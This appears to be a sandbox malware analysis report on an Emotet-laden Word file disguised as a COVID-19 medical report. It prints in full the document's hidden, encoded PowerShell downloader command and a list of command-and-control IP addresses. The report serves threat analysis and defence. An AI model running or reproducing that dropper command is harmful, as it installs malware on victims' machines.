Loading ...

Play interactive tourEdit tour

Analysis Report IU-8549 Medical report COVID-19.doc

Overview

General Information

Sample Name:IU-8549 Medical report COVID-19.doc
Analysis ID:354471
MD5:be33bce1030d367cf23727936fc1fbfd
SHA1:2731bb3115108d14d2a4d5abd49aef32468961c9
SHA256:843ac5a5070a8f77eeb150cf7963ea5a66dd5763b0e3ac3d775333219fa5b773

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1796 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1084 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 592 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1320 cmdline: powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2416 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2296 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2700 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "78.189.148.42:80", "181.165.68.127:80", "78.188.225.105:80", "161.0.153.60:80", "89.106.251.163:80", "172.125.40.123:80", "5.39.91.110:7080", "110.145.11.73:80", "190.251.200.206:80", "144.217.7.207:7080", "75.109.111.18:80", "75.177.207.146:80", "139.59.60.244:8080", "70.183.211.3:80", "95.213.236.64:8080", "61.19.246.238:443", "174.118.202.24:443", "71.72.196.159:80", "138.68.87.218:443", "24.164.79.147:8080", "49.205.182.134:80", "24.231.88.85:80", "121.124.124.40:7080", "95.9.5.93:80", "118.83.154.64:443", "78.24.219.147:8080", "104.131.11.150:443", "85.105.205.77:8080", "108.53.88.101:443", "187.161.206.24:80", "203.153.216.189:7080", "37.187.72.193:8080", "185.94.252.104:443", "157.245.99.39:8080", "50.91.114.38:80", "87.106.139.101:8080", "74.128.121.17:80", "62.75.141.82:80", "37.139.21.175:8080", "190.103.228.24:80", "134.209.144.106:443", "78.182.254.231:80", "186.74.215.34:80", "180.222.161.85:80", "69.49.88.46:80", "202.134.4.211:8080", "75.113.193.72:80", "139.162.60.124:8080", "79.137.83.50:443", "123.176.25.234:80", "172.105.13.66:443", "93.146.48.84:80", "109.116.245.80:80", "41.185.28.84:8080", "98.109.133.80:80", "194.190.67.75:80", "110.145.101.66:443", "136.244.110.184:8080", "24.179.13.119:80", "89.216.122.92:80", "139.99.158.11:443", "172.86.188.251:8080", "74.40.205.197:443", "62.171.142.179:8080", "167.114.153.111:8080", "119.59.116.21:8080", "74.58.215.226:80", "188.165.214.98:8080", "172.104.97.173:8080", "197.211.245.21:80", "66.57.108.14:443", "188.219.31.12:80", "168.235.67.138:7080", "24.69.65.8:8080", "173.70.61.180:80", "110.142.236.207:80", "51.89.36.180:443", "46.105.131.79:8080", "194.4.58.192:7080", "220.245.198.194:80", "109.74.5.95:8080", "24.178.90.49:80", "181.171.209.241:443", "59.21.235.119:80", "94.23.237.171:443", "12.175.220.98:80", "217.20.166.178:7080", "50.116.111.59:8080", "176.111.60.55:8080", "200.116.145.225:443", "120.150.60.189:80", "185.201.9.197:8080", "202.134.4.216:8080", "120.150.218.241:443", "2.58.16.89:8080", "70.92.118.112:80", "74.208.45.104:8080", "79.130.130.240:8080", "190.240.194.77:443", "85.105.111.166:80", "115.94.207.99:443"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.rundll32.exe.1d0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              9.2.rundll32.exe.10000000.8.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                9.2.rundll32.exe.150000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.290000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    12.2.rundll32.exe.10000000.11.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 31 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
